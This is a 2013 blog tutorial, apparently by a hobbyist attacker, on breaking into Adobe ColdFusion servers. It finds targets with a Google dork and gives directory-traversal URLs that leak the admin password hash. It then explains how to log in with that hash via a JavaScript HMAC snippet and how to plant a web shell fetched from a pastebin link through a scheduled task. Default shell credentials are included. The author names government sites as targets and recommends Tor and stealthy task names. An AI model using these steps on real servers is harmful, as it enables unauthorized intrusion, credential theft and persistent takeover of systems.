Monday, 22 July 2013

This tutorial gives you a basic understanding of the ColdFusion exploit. There's very many government and military websites that use this software, but only about 15% are vulnerable. I was nearly into ca.gov last night, but my friend who got into it before me, shelled the server and then patched it so only he has it. (I was extremely mad at this point - haha). Well, let's get started!


What is Adobe ColdFusion?
ColdFusion is a commercial rapid web application development platform invented by Jeremy and JJ Allaire in 1995. (The programming language used with that platform is also commonly called ColdFusion, though is more accurately known as CFML.) ColdFusion was originally designed to make it easier to connect simple HTML pages to a database. By Version 2 (1996), it had become a full platform that included an IDE in addition to a "full" scripting language. As of 2010, versions of ColdFusion (purchased by Adobe Systems in 2005) include advanced features for enterprise integration and development of rich Internet applications.

Requirements
  • Suggested - VPN, Proxy or Tor
  • A Javascript Snippet - Will Be Provided Later On
  • Tamper Data - Firefox (Tor) Plugin

Finding a site that uses Coldfusion:
This is extremely easy by the use of the "ext" google dork:
Code:
ext:cfm

Testing to see it's vulnerable:
The way we test to see if the site's vulnerable, is by first going to the admin panel. So, for example, if we have the following URL:
Code:
http://site/random/directories/shit/lol/document.cfm

We would then go to:
Code:
http://site/CFIDE/administrator

This will then display us the Adobe ColdFusion administrator panel unless we're denied access to the panel. You should see a page like this:

[Image: Oz9pwnk.jpg]
Unfortunately version 10 isn't vulnerable.

You're now going to want to take a note of the Adobe ColdFusion version, this is viewable on the administrator panel. Adobe ColdFusion version 6, 7 and 8 are vulnerable to this attack only. For other versions see 9 & 10 at the bottom of the thread.

I've found a vulnerable version, now what do I do?
You're going to want to follow the exploits below, depending on the version. Please bare in mind, these next parts all have to be done within 30 seconds, as the salt changes every 30 seconds!

(For Version 9 and 10 - Please look near to the bottom of the thread.

Version 6
Code:
http://site/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\CFusionMX\lib\password.propertiesen

Version 7
Code:
http://site/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\CFusionMX7\lib\password.propertiesen​

Version 8
Code:
http://site/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\ColdFusion8\lib\password.propertiese​n

If the exploit is successful, the administrator's password hash value will be displayed on the password. I currently have no vulnerable sites so I cannot show you an example.

Version 9 & 10
You're going to want to install Python. This tutorial is quite dependent on your operating system. I will be focusing on Windows as that's what most of you use. I may write up one for Linux in the future.

First of all, install Python and then install Python Requests (http://docs.python-requests.org/en/latest/). Then save the following script to your Desktop as a.py: http://www.exploit-db.com/exploits/25305/

Windows users:
Open up command prompt and CD to the desktop
Code:
cd desktop

Then to run the script just enter in the name, if you saved it as a.py like I told you then just type:
Code:
a.py

This should run the script.

You now need to enter the URL ONLY, don't put /CFIDE/ after it. Just the URL. If the url is:
Code:
http://dtsc.ca.gov/CFIDE/administrator/

Then you would put the URL like this:
Code:
http://dtsc.ca.gov

Example:

If you get the following feedback, then it is not vulnerable:

If it is vulnerable, you will get feedback from the script with the HMAC. Then proceed to the following steps.

How can I login with a hashed password?
Now, here comes the tricky part!

You're going to make sure you have scripts enabled (for those who have NoScript) - Enter the following javascript code into your browser - although it works better if you use Scratchpad (Shift + F4 for Firefox / Ctrl + Alt + N for Chrome users):
Code:
javascript:alert(hex_hmac_sha1(document.loginform.salt.value,document.loginform.​cfadminPassword.value))

NOTE: IF YOU ARE USING SCRATCHPAD DO NOT INCLUDE THE "java-script:" PART AS IT WILL NOT WORK

You will get an alert with the HMACed hash. Copy this value. Next, start Tamper Data and click "Start Tamper" then click login, and paste the hash you obtained from the javascript in the cfadminPassword field.

If you were fast enough, you will now be logged in! Congratulations if you did it right!

Shelling The Server
What's the point of gaining access to the administrator panel if we can't even shell the server? Well, I'm going to tell you how we can!

You're going to need to have an Adobe ColdFusion Shell. You can try with a regular PHP Shell or an ASP shell but these are usually blocked. I've not been able to find this shell publically anywhere else, and is relatively private. So, for the first time I'm going to be posting here. This is the entire fUZE CFM Shell and is the current best public CFM Shell: http://pastebin.com/raw.php?i=rQHk8ZBs

Save this to your user area (on your PC) as filename.cfm for quick access in the future. Just in case you use the raw shell location, although the raw shell code is what you need for shelling the site.

Now, here comes the shelling. Once you're in the administrator panel of ColdFusion head on over to the "Settings Summary" tab on the left hand side of the panel, and find the "Mappings" section. This page shows you the full path disclosure of the CFIDE location. One of the default mappings is /CFIDE. This is where we will be writing the shell to, as that is the /CFIDE/ part of the website you're in currently. Copy the full path next to where it says /CFIDE.

Next, we need to head on over to the "Debugging and Logging" tab on the left panel and click "Scheduled Tasks". This allows us to run a task on the site (and with a little persuasion, shell the server by uploading a script). Click "Schedule New Task". Set the task name to whatever, it doesn't really matter, if you want to be more stealthy put something like "Scheduled Configuration".

Now, we change the "URL" part of the page to the RAW shell source. Hence why I supplied you with a pastebin in raw format. You can use raw pastebin links unless it is blocked by the sites Firewall. Check the option to save the output to a file. Paste the path you copied from "Mappings" into the "File" field. Type the name you want to save the shell as and the extension (cfm). So, as this is going in the /CFIDE/ directory off the site, name it something like "confg.cfm".

Double check to make sure you have done everything correctly according to this tutorial and then click "OK". Then when the page reloads, click the green check/tick to run the task. This will then upload your shell!

If everything is done correctly, your shell will be uploaded! Now to access the shell:

Code:
http://yourhackedsite.com/CFIDE/yourshellname.cfm

You will be challenged with login information. If you used the default settings from the above script then these will be your details:

Code:
Vexy:pass123

How It Should Be Done
If you want to take a look at how I do things, here you go:
[Image: suZD3nS.png]
a.py = Subzero
b.py = Python 1liner for HMAC/Salt

~Written by Vexy with help from the following link - If you find this thread anywhere else please PM me as they have stole it

Want to go into further depth than this tutorial? View this page: http://www.blackhatlibrary.net/Coldfusion_hacking

0 comments:

Post a Comment